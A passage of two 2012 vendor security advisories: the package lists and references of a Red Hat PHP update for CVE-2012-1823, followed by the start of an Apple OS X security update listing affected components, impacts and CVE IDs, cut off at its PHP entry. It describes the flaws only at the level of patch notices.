https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 818607 - CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827) 6. Package List: RHEL Desktop Workstation (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/php-5.1.6-34.el5_8.src.rpm i386: php-5.1.6-34.el5_8.i386.rpm php-bcmath-5.1.6-34.el5_8.i386.rpm php-cli-5.1.6-34.el5_8.i386.rpm php-common-5.1.6-34.el5_8.i386.rpm php-dba-5.1.6-34.el5_8.i386.rpm php-debuginfo-5.1.6-34.el5_8.i386.rpm php-devel-5.1.6-34.el5_8.i386.rpm php-gd-5.1.6-34.el5_8.i386.rpm php-imap-5.1.6-34.el5_8.i386.rpm php-ldap-5.1.6-34.el5_8.i386.rpm php-mbstring-5.1.6-34.el5_8.i386.rpm php-mysql-5.1.6-34.el5_8.i386.rpm php-ncurses-5.1.6-34.el5_8.i386.rpm php-odbc-5.1.6-34.el5_8.i386.rpm php-pdo-5.1.6-34.el5_8.i386.rpm php-pgsql-5.1.6-34.el5_8.i386.rpm php-snmp-5.1.6-34.el5_8.i386.rpm php-soap-5.1.6-34.el5_8.i386.rpm php-xml-5.1.6-34.el5_8.i386.rpm php-xmlrpc-5.1.6-34.el5_8.i386.rpm x86_64: php-5.1.6-34.el5_8.x86_64.rpm php-bcmath-5.1.6-34.el5_8.x86_64.rpm php-cli-5.1.6-34.el5_8.x86_64.rpm php-common-5.1.6-34.el5_8.x86_64.rpm php-dba-5.1.6-34.el5_8.x86_64.rpm php-debuginfo-5.1.6-34.el5_8.x86_64.rpm php-devel-5.1.6-34.el5_8.x86_64.rpm php-gd-5.1.6-34.el5_8.x86_64.rpm php-imap-5.1.6-34.el5_8.x86_64.rpm php-ldap-5.1.6-34.el5_8.x86_64.rpm php-mbstring-5.1.6-34.el5_8.x86_64.rpm php-mysql-5.1.6-34.el5_8.x86_64.rpm php-ncurses-5.1.6-34.el5_8.x86_64.rpm php-odbc-5.1.6-34.el5_8.x86_64.rpm php-pdo-5.1.6-34.el5_8.x86_64.rpm php-pgsql-5.1.6-34.el5_8.x86_64.rpm php-snmp-5.1.6-34.el5_8.x86_64.rpm php-soap-5.1.6-34.el5_8.x86_64.rpm php-xml-5.1.6-34.el5_8.x86_64.rpm php-xmlrpc-5.1.6-34.el5_8.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/php-5.1.6-34.el5_8.src.rpm i386: php-5.1.6-34.el5_8.i386.rpm php-bcmath-5.1.6-34.el5_8.i386.rpm php-cli-5.1.6-34.el5_8.i386.rpm php-common-5.1.6-34.el5_8.i386.rpm php-dba-5.1.6-34.el5_8.i386.rpm php-debuginfo-5.1.6-34.el5_8.i386.rpm php-devel-5.1.6-34.el5_8.i386.rpm php-gd-5.1.6-34.el5_8.i386.rpm php-imap-5.1.6-34.el5_8.i386.rpm php-ldap-5.1.6-34.el5_8.i386.rpm php-mbstring-5.1.6-34.el5_8.i386.rpm php-mysql-5.1.6-34.el5_8.i386.rpm php-ncurses-5.1.6-34.el5_8.i386.rpm php-odbc-5.1.6-34.el5_8.i386.rpm php-pdo-5.1.6-34.el5_8.i386.rpm php-pgsql-5.1.6-34.el5_8.i386.rpm php-snmp-5.1.6-34.el5_8.i386.rpm php-soap-5.1.6-34.el5_8.i386.rpm php-xml-5.1.6-34.el5_8.i386.rpm php-xmlrpc-5.1.6-34.el5_8.i386.rpm ia64: php-5.1.6-34.el5_8.ia64.rpm php-bcmath-5.1.6-34.el5_8.ia64.rpm php-cli-5.1.6-34.el5_8.ia64.rpm php-common-5.1.6-34.el5_8.ia64.rpm php-dba-5.1.6-34.el5_8.ia64.rpm php-debuginfo-5.1.6-34.el5_8.ia64.rpm php-devel-5.1.6-34.el5_8.ia64.rpm php-gd-5.1.6-34.el5_8.ia64.rpm php-imap-5.1.6-34.el5_8.ia64.rpm php-ldap-5.1.6-34.el5_8.ia64.rpm php-mbstring-5.1.6-34.el5_8.ia64.rpm php-mysql-5.1.6-34.el5_8.ia64.rpm php-ncurses-5.1.6-34.el5_8.ia64.rpm php-odbc-5.1.6-34.el5_8.ia64.rpm php-pdo-5.1.6-34.el5_8.ia64.rpm php-pgsql-5.1.6-34.el5_8.ia64.rpm php-snmp-5.1.6-34.el5_8.ia64.rpm php-soap-5.1.6-34.el5_8.ia64.rpm php-xml-5.1.6-34.el5_8.ia64.rpm php-xmlrpc-5.1.6-34.el5_8.ia64.rpm ppc: php-5.1.6-34.el5_8.ppc.rpm php-bcmath-5.1.6-34.el5_8.ppc.rpm php-cli-5.1.6-34.el5_8.ppc.rpm php-common-5.1.6-34.el5_8.ppc.rpm php-dba-5.1.6-34.el5_8.ppc.rpm php-debuginfo-5.1.6-34.el5_8.ppc.rpm php-devel-5.1.6-34.el5_8.ppc.rpm php-gd-5.1.6-34.el5_8.ppc.rpm php-imap-5.1.6-34.el5_8.ppc.rpm php-ldap-5.1.6-34.el5_8.ppc.rpm php-mbstring-5.1.6-34.el5_8.ppc.rpm php-mysql-5.1.6-34.el5_8.ppc.rpm php-ncurses-5.1.6-34.el5_8.ppc.rpm php-odbc-5.1.6-34.el5_8.ppc.rpm php-pdo-5.1.6-34.el5_8.ppc.rpm php-pgsql-5.1.6-34.el5_8.ppc.rpm php-snmp-5.1.6-34.el5_8.ppc.rpm php-soap-5.1.6-34.el5_8.ppc.rpm php-xml-5.1.6-34.el5_8.ppc.rpm php-xmlrpc-5.1.6-34.el5_8.ppc.rpm s390x: php-5.1.6-34.el5_8.s390x.rpm php-bcmath-5.1.6-34.el5_8.s390x.rpm php-cli-5.1.6-34.el5_8.s390x.rpm php-common-5.1.6-34.el5_8.s390x.rpm php-dba-5.1.6-34.el5_8.s390x.rpm php-debuginfo-5.1.6-34.el5_8.s390x.rpm php-devel-5.1.6-34.el5_8.s390x.rpm php-gd-5.1.6-34.el5_8.s390x.rpm php-imap-5.1.6-34.el5_8.s390x.rpm php-ldap-5.1.6-34.el5_8.s390x.rpm php-mbstring-5.1.6-34.el5_8.s390x.rpm php-mysql-5.1.6-34.el5_8.s390x.rpm php-ncurses-5.1.6-34.el5_8.s390x.rpm php-odbc-5.1.6-34.el5_8.s390x.rpm php-pdo-5.1.6-34.el5_8.s390x.rpm php-pgsql-5.1.6-34.el5_8.s390x.rpm php-snmp-5.1.6-34.el5_8.s390x.rpm php-soap-5.1.6-34.el5_8.s390x.rpm php-xml-5.1.6-34.el5_8.s390x.rpm php-xmlrpc-5.1.6-34.el5_8.s390x.rpm x86_64: php-5.1.6-34.el5_8.x86_64.rpm php-bcmath-5.1.6-34.el5_8.x86_64.rpm php-cli-5.1.6-34.el5_8.x86_64.rpm php-common-5.1.6-34.el5_8.x86_64.rpm php-dba-5.1.6-34.el5_8.x86_64.rpm php-debuginfo-5.1.6-34.el5_8.x86_64.rpm php-devel-5.1.6-34.el5_8.x86_64.rpm php-gd-5.1.6-34.el5_8.x86_64.rpm php-imap-5.1.6-34.el5_8.x86_64.rpm php-ldap-5.1.6-34.el5_8.x86_64.rpm php-mbstring-5.1.6-34.el5_8.x86_64.rpm php-mysql-5.1.6-34.el5_8.x86_64.rpm php-ncurses-5.1.6-34.el5_8.x86_64.rpm php-odbc-5.1.6-34.el5_8.x86_64.rpm php-pdo-5.1.6-34.el5_8.x86_64.rpm php-pgsql-5.1.6-34.el5_8.x86_64.rpm php-snmp-5.1.6-34.el5_8.x86_64.rpm php-soap-5.1.6-34.el5_8.x86_64.rpm php-xml-5.1.6-34.el5_8.x86_64.rpm php-xmlrpc-5.1.6-34.el5_8.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm i386: php-5.3.3-3.el6_2.8.i686.rpm php-bcmath-5.3.3-3.el6_2.8.i686.rpm php-cli-5.3.3-3.el6_2.8.i686.rpm php-common-5.3.3-3.el6_2.8.i686.rpm php-dba-5.3.3-3.el6_2.8.i686.rpm php-debuginfo-5.3.3-3.el6_2.8.i686.rpm php-devel-5.3.3-3.el6_2.8.i686.rpm php-embedded-5.3.3-3.el6_2.8.i686.rpm php-enchant-5.3.3-3.el6_2.8.i686.rpm php-gd-5.3.3-3.el6_2.8.i686.rpm php-imap-5.3.3-3.el6_2.8.i686.rpm php-intl-5.3.3-3.el6_2.8.i686.rpm php-ldap-5.3.3-3.el6_2.8.i686.rpm php-mbstring-5.3.3-3.el6_2.8.i686.rpm php-mysql-5.3.3-3.el6_2.8.i686.rpm php-odbc-5.3.3-3.el6_2.8.i686.rpm php-pdo-5.3.3-3.el6_2.8.i686.rpm php-pgsql-5.3.3-3.el6_2.8.i686.rpm php-process-5.3.3-3.el6_2.8.i686.rpm php-pspell-5.3.3-3.el6_2.8.i686.rpm php-recode-5.3.3-3.el6_2.8.i686.rpm php-snmp-5.3.3-3.el6_2.8.i686.rpm php-soap-5.3.3-3.el6_2.8.i686.rpm php-tidy-5.3.3-3.el6_2.8.i686.rpm php-xml-5.3.3-3.el6_2.8.i686.rpm php-xmlrpc-5.3.3-3.el6_2.8.i686.rpm php-zts-5.3.3-3.el6_2.8.i686.rpm x86_64: php-5.3.3-3.el6_2.8.x86_64.rpm php-bcmath-5.3.3-3.el6_2.8.x86_64.rpm php-cli-5.3.3-3.el6_2.8.x86_64.rpm php-common-5.3.3-3.el6_2.8.x86_64.rpm php-dba-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm php-devel-5.3.3-3.el6_2.8.x86_64.rpm php-embedded-5.3.3-3.el6_2.8.x86_64.rpm php-enchant-5.3.3-3.el6_2.8.x86_64.rpm php-gd-5.3.3-3.el6_2.8.x86_64.rpm php-imap-5.3.3-3.el6_2.8.x86_64.rpm php-intl-5.3.3-3.el6_2.8.x86_64.rpm php-ldap-5.3.3-3.el6_2.8.x86_64.rpm php-mbstring-5.3.3-3.el6_2.8.x86_64.rpm php-mysql-5.3.3-3.el6_2.8.x86_64.rpm php-odbc-5.3.3-3.el6_2.8.x86_64.rpm php-pdo-5.3.3-3.el6_2.8.x86_64.rpm php-pgsql-5.3.3-3.el6_2.8.x86_64.rpm php-process-5.3.3-3.el6_2.8.x86_64.rpm php-pspell-5.3.3-3.el6_2.8.x86_64.rpm php-recode-5.3.3-3.el6_2.8.x86_64.rpm php-snmp-5.3.3-3.el6_2.8.x86_64.rpm php-soap-5.3.3-3.el6_2.8.x86_64.rpm php-tidy-5.3.3-3.el6_2.8.x86_64.rpm php-xml-5.3.3-3.el6_2.8.x86_64.rpm php-xmlrpc-5.3.3-3.el6_2.8.x86_64.rpm php-zts-5.3.3-3.el6_2.8.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm x86_64: php-cli-5.3.3-3.el6_2.8.x86_64.rpm php-common-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm x86_64: php-5.3.3-3.el6_2.8.x86_64.rpm php-bcmath-5.3.3-3.el6_2.8.x86_64.rpm php-dba-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm php-devel-5.3.3-3.el6_2.8.x86_64.rpm php-embedded-5.3.3-3.el6_2.8.x86_64.rpm php-enchant-5.3.3-3.el6_2.8.x86_64.rpm php-gd-5.3.3-3.el6_2.8.x86_64.rpm php-imap-5.3.3-3.el6_2.8.x86_64.rpm php-intl-5.3.3-3.el6_2.8.x86_64.rpm php-ldap-5.3.3-3.el6_2.8.x86_64.rpm php-mbstring-5.3.3-3.el6_2.8.x86_64.rpm php-mysql-5.3.3-3.el6_2.8.x86_64.rpm php-odbc-5.3.3-3.el6_2.8.x86_64.rpm php-pdo-5.3.3-3.el6_2.8.x86_64.rpm php-pgsql-5.3.3-3.el6_2.8.x86_64.rpm php-process-5.3.3-3.el6_2.8.x86_64.rpm php-pspell-5.3.3-3.el6_2.8.x86_64.rpm php-recode-5.3.3-3.el6_2.8.x86_64.rpm php-snmp-5.3.3-3.el6_2.8.x86_64.rpm php-soap-5.3.3-3.el6_2.8.x86_64.rpm php-tidy-5.3.3-3.el6_2.8.x86_64.rpm php-xml-5.3.3-3.el6_2.8.x86_64.rpm php-xmlrpc-5.3.3-3.el6_2.8.x86_64.rpm php-zts-5.3.3-3.el6_2.8.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm i386: php-5.3.3-3.el6_2.8.i686.rpm php-cli-5.3.3-3.el6_2.8.i686.rpm php-common-5.3.3-3.el6_2.8.i686.rpm php-debuginfo-5.3.3-3.el6_2.8.i686.rpm php-gd-5.3.3-3.el6_2.8.i686.rpm php-ldap-5.3.3-3.el6_2.8.i686.rpm php-mysql-5.3.3-3.el6_2.8.i686.rpm php-odbc-5.3.3-3.el6_2.8.i686.rpm php-pdo-5.3.3-3.el6_2.8.i686.rpm php-pgsql-5.3.3-3.el6_2.8.i686.rpm php-soap-5.3.3-3.el6_2.8.i686.rpm php-xml-5.3.3-3.el6_2.8.i686.rpm php-xmlrpc-5.3.3-3.el6_2.8.i686.rpm ppc64: php-5.3.3-3.el6_2.8.ppc64.rpm php-cli-5.3.3-3.el6_2.8.ppc64.rpm php-common-5.3.3-3.el6_2.8.ppc64.rpm php-debuginfo-5.3.3-3.el6_2.8.ppc64.rpm php-gd-5.3.3-3.el6_2.8.ppc64.rpm php-ldap-5.3.3-3.el6_2.8.ppc64.rpm php-mysql-5.3.3-3.el6_2.8.ppc64.rpm php-odbc-5.3.3-3.el6_2.8.ppc64.rpm php-pdo-5.3.3-3.el6_2.8.ppc64.rpm php-pgsql-5.3.3-3.el6_2.8.ppc64.rpm php-soap-5.3.3-3.el6_2.8.ppc64.rpm php-xml-5.3.3-3.el6_2.8.ppc64.rpm php-xmlrpc-5.3.3-3.el6_2.8.ppc64.rpm s390x: php-5.3.3-3.el6_2.8.s390x.rpm php-cli-5.3.3-3.el6_2.8.s390x.rpm php-common-5.3.3-3.el6_2.8.s390x.rpm php-debuginfo-5.3.3-3.el6_2.8.s390x.rpm php-gd-5.3.3-3.el6_2.8.s390x.rpm php-ldap-5.3.3-3.el6_2.8.s390x.rpm php-mysql-5.3.3-3.el6_2.8.s390x.rpm php-odbc-5.3.3-3.el6_2.8.s390x.rpm php-pdo-5.3.3-3.el6_2.8.s390x.rpm php-pgsql-5.3.3-3.el6_2.8.s390x.rpm php-soap-5.3.3-3.el6_2.8.s390x.rpm php-xml-5.3.3-3.el6_2.8.s390x.rpm php-xmlrpc-5.3.3-3.el6_2.8.s390x.rpm x86_64: php-5.3.3-3.el6_2.8.x86_64.rpm php-cli-5.3.3-3.el6_2.8.x86_64.rpm php-common-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm php-gd-5.3.3-3.el6_2.8.x86_64.rpm php-ldap-5.3.3-3.el6_2.8.x86_64.rpm php-mysql-5.3.3-3.el6_2.8.x86_64.rpm php-odbc-5.3.3-3.el6_2.8.x86_64.rpm php-pdo-5.3.3-3.el6_2.8.x86_64.rpm php-pgsql-5.3.3-3.el6_2.8.x86_64.rpm php-soap-5.3.3-3.el6_2.8.x86_64.rpm php-xml-5.3.3-3.el6_2.8.x86_64.rpm php-xmlrpc-5.3.3-3.el6_2.8.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm i386: php-bcmath-5.3.3-3.el6_2.8.i686.rpm php-dba-5.3.3-3.el6_2.8.i686.rpm php-debuginfo-5.3.3-3.el6_2.8.i686.rpm php-devel-5.3.3-3.el6_2.8.i686.rpm php-embedded-5.3.3-3.el6_2.8.i686.rpm php-enchant-5.3.3-3.el6_2.8.i686.rpm php-imap-5.3.3-3.el6_2.8.i686.rpm php-intl-5.3.3-3.el6_2.8.i686.rpm php-mbstring-5.3.3-3.el6_2.8.i686.rpm php-process-5.3.3-3.el6_2.8.i686.rpm php-pspell-5.3.3-3.el6_2.8.i686.rpm php-recode-5.3.3-3.el6_2.8.i686.rpm php-snmp-5.3.3-3.el6_2.8.i686.rpm php-tidy-5.3.3-3.el6_2.8.i686.rpm php-zts-5.3.3-3.el6_2.8.i686.rpm ppc64: php-bcmath-5.3.3-3.el6_2.8.ppc64.rpm php-dba-5.3.3-3.el6_2.8.ppc64.rpm php-debuginfo-5.3.3-3.el6_2.8.ppc64.rpm php-devel-5.3.3-3.el6_2.8.ppc64.rpm php-embedded-5.3.3-3.el6_2.8.ppc64.rpm php-enchant-5.3.3-3.el6_2.8.ppc64.rpm php-imap-5.3.3-3.el6_2.8.ppc64.rpm php-intl-5.3.3-3.el6_2.8.ppc64.rpm php-mbstring-5.3.3-3.el6_2.8.ppc64.rpm php-process-5.3.3-3.el6_2.8.ppc64.rpm php-pspell-5.3.3-3.el6_2.8.ppc64.rpm php-recode-5.3.3-3.el6_2.8.ppc64.rpm php-snmp-5.3.3-3.el6_2.8.ppc64.rpm php-tidy-5.3.3-3.el6_2.8.ppc64.rpm php-zts-5.3.3-3.el6_2.8.ppc64.rpm s390x: php-bcmath-5.3.3-3.el6_2.8.s390x.rpm php-dba-5.3.3-3.el6_2.8.s390x.rpm php-debuginfo-5.3.3-3.el6_2.8.s390x.rpm php-devel-5.3.3-3.el6_2.8.s390x.rpm php-embedded-5.3.3-3.el6_2.8.s390x.rpm php-enchant-5.3.3-3.el6_2.8.s390x.rpm php-imap-5.3.3-3.el6_2.8.s390x.rpm php-intl-5.3.3-3.el6_2.8.s390x.rpm php-mbstring-5.3.3-3.el6_2.8.s390x.rpm php-process-5.3.3-3.el6_2.8.s390x.rpm php-pspell-5.3.3-3.el6_2.8.s390x.rpm php-recode-5.3.3-3.el6_2.8.s390x.rpm php-snmp-5.3.3-3.el6_2.8.s390x.rpm php-tidy-5.3.3-3.el6_2.8.s390x.rpm php-zts-5.3.3-3.el6_2.8.s390x.rpm x86_64: php-bcmath-5.3.3-3.el6_2.8.x86_64.rpm php-dba-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm php-devel-5.3.3-3.el6_2.8.x86_64.rpm php-embedded-5.3.3-3.el6_2.8.x86_64.rpm php-enchant-5.3.3-3.el6_2.8.x86_64.rpm php-imap-5.3.3-3.el6_2.8.x86_64.rpm php-intl-5.3.3-3.el6_2.8.x86_64.rpm php-mbstring-5.3.3-3.el6_2.8.x86_64.rpm php-process-5.3.3-3.el6_2.8.x86_64.rpm php-pspell-5.3.3-3.el6_2.8.x86_64.rpm php-recode-5.3.3-3.el6_2.8.x86_64.rpm php-snmp-5.3.3-3.el6_2.8.x86_64.rpm php-tidy-5.3.3-3.el6_2.8.x86_64.rpm php-zts-5.3.3-3.el6_2.8.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm i386: php-5.3.3-3.el6_2.8.i686.rpm php-cli-5.3.3-3.el6_2.8.i686.rpm php-common-5.3.3-3.el6_2.8.i686.rpm php-debuginfo-5.3.3-3.el6_2.8.i686.rpm php-gd-5.3.3-3.el6_2.8.i686.rpm php-ldap-5.3.3-3.el6_2.8.i686.rpm php-mysql-5.3.3-3.el6_2.8.i686.rpm php-odbc-5.3.3-3.el6_2.8.i686.rpm php-pdo-5.3.3-3.el6_2.8.i686.rpm php-pgsql-5.3.3-3.el6_2.8.i686.rpm php-soap-5.3.3-3.el6_2.8.i686.rpm php-xml-5.3.3-3.el6_2.8.i686.rpm php-xmlrpc-5.3.3-3.el6_2.8.i686.rpm x86_64: php-5.3.3-3.el6_2.8.x86_64.rpm php-cli-5.3.3-3.el6_2.8.x86_64.rpm php-common-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm php-gd-5.3.3-3.el6_2.8.x86_64.rpm php-ldap-5.3.3-3.el6_2.8.x86_64.rpm php-mysql-5.3.3-3.el6_2.8.x86_64.rpm php-odbc-5.3.3-3.el6_2.8.x86_64.rpm php-pdo-5.3.3-3.el6_2.8.x86_64.rpm php-pgsql-5.3.3-3.el6_2.8.x86_64.rpm php-soap-5.3.3-3.el6_2.8.x86_64.rpm php-xml-5.3.3-3.el6_2.8.x86_64.rpm php-xmlrpc-5.3.3-3.el6_2.8.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-3.el6_2.8.src.rpm i386: php-bcmath-5.3.3-3.el6_2.8.i686.rpm php-dba-5.3.3-3.el6_2.8.i686.rpm php-debuginfo-5.3.3-3.el6_2.8.i686.rpm php-devel-5.3.3-3.el6_2.8.i686.rpm php-embedded-5.3.3-3.el6_2.8.i686.rpm php-enchant-5.3.3-3.el6_2.8.i686.rpm php-imap-5.3.3-3.el6_2.8.i686.rpm php-intl-5.3.3-3.el6_2.8.i686.rpm php-mbstring-5.3.3-3.el6_2.8.i686.rpm php-process-5.3.3-3.el6_2.8.i686.rpm php-pspell-5.3.3-3.el6_2.8.i686.rpm php-recode-5.3.3-3.el6_2.8.i686.rpm php-snmp-5.3.3-3.el6_2.8.i686.rpm php-tidy-5.3.3-3.el6_2.8.i686.rpm php-zts-5.3.3-3.el6_2.8.i686.rpm x86_64: php-bcmath-5.3.3-3.el6_2.8.x86_64.rpm php-dba-5.3.3-3.el6_2.8.x86_64.rpm php-debuginfo-5.3.3-3.el6_2.8.x86_64.rpm php-devel-5.3.3-3.el6_2.8.x86_64.rpm php-embedded-5.3.3-3.el6_2.8.x86_64.rpm php-enchant-5.3.3-3.el6_2.8.x86_64.rpm php-imap-5.3.3-3.el6_2.8.x86_64.rpm php-intl-5.3.3-3.el6_2.8.x86_64.rpm php-mbstring-5.3.3-3.el6_2.8.x86_64.rpm php-process-5.3.3-3.el6_2.8.x86_64.rpm php-pspell-5.3.3-3.el6_2.8.x86_64.rpm php-recode-5.3.3-3.el6_2.8.x86_64.rpm php-snmp-5.3.3-3.el6_2.8.x86_64.rpm php-tidy-5.3.3-3.el6_2.8.x86_64.rpm php-zts-5.3.3-3.el6_2.8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-1823.html https://access.redhat.com/security/updates/classification/#critical 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPqBidXlSAg2UNWIIRAtuSAJwIgGRkPkW5/AUENoUr0jScjBiojQCeLkVK WUs1dQ+935LKCja022LRegM= =dMtA -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-09-19-2 OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update 2012-004 OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update 2012-004 are now available and address the following: Apache Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Multiple vulnerabilities in Apache Description: Apache is updated to version 2.2.22 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3368 CVE-2011-3607 CVE-2011-4317 CVE-2012-0021 CVE-2012-0031 CVE-2012-0053 BIND Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: A remote attacker may be able to cause a denial of service in systems configured to run BIND as a DNS nameserver Description: A reachable assertion issue existed in the handling of DNS records. This issue was addressed by updating to BIND 9.7.6-P1. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-4313 BIND Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: A remote attacker may be able to cause a denial of service, data corruption, or obtain sensitive information from process memory in systems configured to run BIND as a DNS nameserver Description: A memory management issue existed in the handling of DNS records. This issue was addressed by updating to BIND 9.7.6-P1 on OS X Lion systems, and BIND 9.8.3-P1 on OS X Mountain Lion systems. CVE-ID CVE-2012-1667 CoreText Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Applications that use CoreText may be vulnerable to an unexpected application termination or arbitrary code execution Description: A bounds checking issue existed in the handling of text glyphs, which may lead to out of bounds memory reads or writes. This issue was addressed through improved bounds checking. This issue does not affect Mac OS X v10.6 or OS X Mountain Lion systems. CVE-ID CVE-2012-3716 : Jesse Ruderman of Mozilla Corporation Data Security Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: TrustWave, a trusted root CA, has issued, and subsequently revoked, a sub-CA certificate from one of its trusted anchors. This sub-CA facilitated the interception of communications secured by Transport Layer Security (TLS). This update adds the involved sub-CA certificate to OS X's list of untrusted certificates. DirectoryService Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: If the DirectoryService Proxy is used, a remote attacker may cause a denial of service or arbitrary code execution Description: A buffer overflow existed in the DirectoryService Proxy. This issue was addressed through improved bounds checking. This issue does not affect OS X Lion and Mountain Lion systems. CVE-ID CVE-2012-0650 : aazubel working with HP's Zero Day Initiative ImageIO Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libpng's handling of PNG images. These issues were addressed through improved validation of PNG images. These issues do not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3026 : Juri Aedla CVE-2011-3048 ImageIO Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow issue existed in libTIFF's handling of TIFF images. This issue was addressed through improved validation of TIFF images. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day Initiative Installer Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Remote admins and persons with physical access to the system may obtain account information Description: The fix for CVE-2012-0652 in OS X Lion 10.7.4 prevented user passwords from being recorded in the system log, but did not remove the old log entries. This issue was addressed by deleting log files that contained passwords. This issue does not affect Mac OS X 10.6 or OS X Mountain Lion systems. CVE-ID CVE-2012-0652 International Components for Unicode Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the handling of ICU locale IDs. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-4599 Kernel Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: A malicious program could bypass sandbox restrictions Description: A logic issue existed in the handling of debug system calls. This may allow a malicious program to gain code execution in other programs with the same user privileges. This issue was addressed by disabling handling of addresses in PT_STEP and PT_CONTINUE. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0643 : iOS Jailbreak Dream Team LoginWindow Available for: OS X Mountain Lion v10.8 and v10.8.1 Impact: A local user may be able to obtain other user's login passwords Description: A user-installed input method could intercept password keystrokes from Login Window or Screen Saver Unlock. This issue was addressed by preventing user-installed methods from being used when the system is handling login information. CVE-ID CVE-2012-3718 : An anonymous researcher Mail Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing an e-mail message may lead to execution of web plugins Description: An input validation issue existed in Mail's handling of embedded web plugins. This issue was addressed by disabling third- party plug-ins in Mail. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3719 : Will Dormann of the CERT/CC Mobile Accounts Available for: OS X Mountain Lion v10.8 and v10.8.1 Impact: A user with access to the contents of a mobile account may obtain the account password Description: Creating a mobile account saved a hash of the password in the account, which was used to login when the mobile account was used as an external account. The password hash could be used to determine the user's password. This issue was addressed by creating the password hash only if external accounts are enabled on the system where the mobile account is created. CVE-ID CVE-2012-3720 : Harald Wagener of Google, Inc. PHP Available for: Mac OS X 